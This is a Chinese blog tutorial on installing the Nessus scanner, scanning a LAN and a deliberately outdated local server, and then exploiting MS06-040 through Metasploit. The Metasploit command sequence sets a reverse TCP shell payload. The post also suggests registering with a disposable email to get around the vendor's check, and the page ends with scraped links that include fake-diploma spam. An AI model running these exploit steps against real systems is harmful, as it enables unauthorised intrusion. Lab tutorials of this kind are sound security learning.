『安全工具』Nessus多功能扫描器
0x 00 前言
写这篇博客,证明我还活着……
0x 01 安装Nessus
直接官网 www.tenable.com/products/nessus/select-your-operating-system
选择Nessus Home版下载,下载之后点击安装我这里是Nessus-6.1.0-x64版(附件处有百度网盘链接)
安装开始设置一个用户名和密码(记住,使用Nessus时会验证)
然后选择文件安装目录
之后会提示更新插件,这个要通过官网注册获取激活码来更新的
我们在官网 www.tenable.com/products/nessus/evaluate注册账户,打开注册邮箱就可以收到激活码了~
注意:注册邮箱不能使用 qq\163\gmail\hotmail 等公共邮箱,要用企业邮箱才可以
在这里推荐使用“一小时邮箱”进行注册,具体使用方法问度娘吧
填好激活码之后,插件自动更新,我这里5分钟左右就更新好了
0x 02 软件使用
浏览器打开 https://localhost:8834 后显示客户端界面
输入先前设置的用户名密码登录
1. 扫描局域网存活主机
点击“New Scan”,
在提供的默认模版里选择一个模版,这里选择“Host Discovery”,
在弹出的通用配置里设置“Name”(本次扫描的名字),“Target”(扫描目标)
我扫的是192.168.1.1全网段的 ,看图

之后“点击保存”后会进行自动扫描
2分钟之后结果就来了,在这里

看到了米有,9个主机在线,测试结果与真实环境相同的
NMAP也能完成主机探测我会乱说,所以说Nessus牛的地方不是在这,所以下面来了
2. 主机扫描
我在本地搭了个低版本服务器,IP为192.168.1.112
新建扫描,设置扫描策略为“Advanced Scan”,
然后 “Target”填上192.168.1.112
因为扫的是同个局域网内的速度还是比较快的,结果倒是让我惊呆了Orz...

20个紧急漏洞,8个高危漏洞,醉了有木有 = = 速度戳之

上面MSxx-xxx是微软漏洞编码,随随便便选择一个找到Exp就可以愉悦的玩耍了 ~~
接下来漏洞结合MSF进行漏洞利用~
当然,直接根据漏洞的编码百度一下利用方法也是可以的,这里就直接用BT5吧
找一个比较老的洞:ms06-040
BT5 的 CMD 输入 msfconsole 进入MSF欢迎界面(时间略长,等下就OK了)
我们按照MSF的一般执行过程来操作(选择模版—设置PAYLOAD—设置参数—攻击)
search ms06_040 // 查找ms06_040相关漏洞模块
找到对应模块后
use exploit/windows/smb/ms06_040_netapi // 使用ms06_040_netapi模块
show options // 查看漏洞配置信息
set PAYLOAD windows/shell/reverse_tcp // 设置PAYLOAD
set RHOST 192.168.1.112 // 目标IP
set LHOST 192.168.1.117 // 本机IP
// 端口号 和 目标类型 默认就OK了
exploit // 进行攻击
然后看拿到拿到了神马……

附件:
Nessus-6.1.0-x64 百度网盘:pan.baidu.com/s/1hq48j20 9fgu
『安全工具』Nessus多功能扫描器的更多相关文章
- 『安全工具』Nmap 强悍的端口扫描工具
作为时下流行的端口扫描工具,Nmap有因其扫描的隐密性有“端口扫描之王”之称 上图是黑客帝国(The Matrix)中崔妮蒂用Nmap入侵核发电站的能源管理系统 0x 01 Nmap介绍 Nmap是一 ...
- 『安全工具』目录扫描 DirBuster AND 御剑
要想熟悉目标网站的体系架构,知道网站有哪些目录是必不可少的 向AWVS,Burp类大型扫描工具也可以进行目录扫描,不过个人感觉远没有专业扫描工具来的简单,实在 0x 01 DirBuster 简介:D ...
- 『安全工具』注入神器SQLMAP
Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLM ...
- 『 效率工具 』Spring Boot版的轻量级代码生成器,减少70%以上的开发任务
一. 前言 之前很着迷于代码自动生成,减少写重复代码的工作量.网络上也搜索了很久,有基于插件的,有GUI的.但其配置和学习成本都比较高,都不是很如我意. 本想自己用SpringBoot写一个,在收集相 ...
- 『在线工具』 基于 xsser.me 源码 + BootStrap 前端 的 XSS 平台
乌云社区上一个小伙伴的对xsser.me 的源码做了 BS 的优化,本人已经搭建好,提供给大家免费使用,大牛求绕过,多谢. 地址: http://xss.evilclay.com (目前开放注册,不需 ...
- 『开发技巧』Python音频操作工具PyAudio上手教程
『开发技巧』Python音频操作工具PyAudio上手教程 0.引子 当需要使用Python处理音频数据时,使用python读取与播放声音必不可少,下面介绍一个好用的处理音频PyAudio工具包. ...
- Github 恶搞教程(一起『玩坏』自己的 Github 吧)
最近在伯乐在线读到一篇趣文,<如何在 Github『正确』做贡献>,里面各种能人恶搞 Github 的『Public contributions』,下面截取几个小伙伴的战绩: 顺藤摸瓜,发 ...
- 办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary
办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...
- 办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta
办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...
随机推荐
- 在win2003上安装配置win 服务 遇到的问题
在win2003上安装配置win 服务 win服务安装后启动不起来 .. 没有装.net framework4.0 要装这个版本 mysql-connector-net-6.3.4.zip ...
- 基于Minifilter框架的文件过滤驱动理解
概述 Minifilter即File System Minifilter Drivers,是Windows为了简化第三方开发人员开发文件过滤驱动而提供的一套框架,这个框架依赖于一个称之为Filter ...
- 路由器的nat模式、路由模式和全模式
NAT模式.此模式下,由局域网向广域网发送的数据包默认经过NAT转换,但路由器对所有源地址与局域网接口不在同一网段的数据包均不进行处理.例如,路由器LAN口IP设置为192.168.1.1,子网掩码为 ...
- js获取当前页面的url中id
function UrlSearch() { var name, value; var str = location.href; //获取到整个地址 var num = str.indexOf(&qu ...
- iOS 设备和外部配件的通讯
首先,如果我们的应用程序想跟外设传输数据,先要透过iphone的操作系统,也就是iphoneOS,而最开始的认证过程也是在外设和iphoneOS之间发生的,苹果为这个过程提供了一颗认证芯片(这颗芯片的 ...
- View Controller 生命周期的各个方法的用法
(void)awakeFromNib; 这个方法用的时候,outlet还没有连接起来,是view Controller刚从storyboard建的时候,没有完全建好,不过可能有一些事情要在这个方法里面 ...
- 分层模型的典型应用和FishiGUI的分层模型
分层模式的典型应用: 对于交互类型的软件也能够採用分层模式来进行架构分析,一般来说将交互性的软件分为三个层次比較合适:显示层的职责是为了显示信息,应用逻辑层封装那些一般不easy发生变化的核心逻辑,而 ...
- java.net.MulticastSocket Example--reference
In this example we are going to explain how to use MulticastSocket in Java, in order to enable a ser ...
- java相关的路径获取 (转载 http://tomfish88.iteye.com/blog/971255)
在jsp和class文件中调用的相对路径不同.在jsp里,根目录是WebRoot 在class文件中,根目录是WebRoot/WEB-INF/classes 当然你也可以用System.getProp ...
- mockito学习
mockito学习 写一个测试用例,如果在测试类上面添加了注解@RunWith(SpringJUnit4ClassRunner.class),必须添加@ContextConfiguration(&qu ...